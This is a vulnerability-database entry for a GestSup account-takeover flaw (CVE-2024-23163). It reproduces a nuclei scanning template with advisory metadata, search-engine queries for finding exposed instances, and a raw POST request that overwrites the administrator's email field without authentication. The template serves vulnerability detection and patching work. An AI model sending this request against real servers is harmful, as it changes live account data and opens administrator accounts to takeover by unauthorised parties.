Lucene search
K

GestSup - Account Takeover

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 47 Views

GestSup - Account Takeover, CVE-2024-23163, critical severity. Attacker can bypass authentication to access application as administrator by modifying usermail field

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2024-23163
7 Aug 202412:59
cve
id: CVE-2024-23163

info:
  name: GestSup - Account Takeover
  author: eeche,chae1xx1os,persona-twotwo,soonghee2,gy741
  severity: critical
  description: GestSup contains an authentication bypass vulnerability allowing attackers to take over user accounts, leading to full compromise including data disclosure and modification.
  impact: |
    An attacker could bypass the authentication process and access the application as an administrator user by modifying the usermail field to a controlled email address and requesting a password reset.
  remediation: Apply necessary security patches or updates provided by the vendor to secure the ticket_user_db.php endpoint and ensure proper authentication checks are in place.
  reference:
    - https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23163
    - https://doc.gestsup.fr/install/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-23163
    cwe-id: CWE-287
    cpe: cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gestsup
    fofa-query: title="GestSup"
    shodan-query: http.favicon.hash:-283003760
    product: gestsup
  tags: cve,cve2024,account-takeover,gestsup,vuln

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /ajax/ticket_user_db.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: xmlhttprequest
        Content-Type: application/x-www-form-urlencoded

        modifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"status":"success'
          - 'firstname":"{{firstname}}","lastname":"{{lastname}}'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

    extractors:
      - type: dsl
        dsl:
          - '"Firstname: "+ firstname'
          - '"Lastname: "+ lastname'
# digest: 490a004630440220179f3ecdd853a2a259c56285909a87e8e5c736b89f9f8997a974abb3ffc86c6f022027e0f8e3a79f0e9ef694726f2cdc22aa83623b64b522fbfb8319a5edc49e48e1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation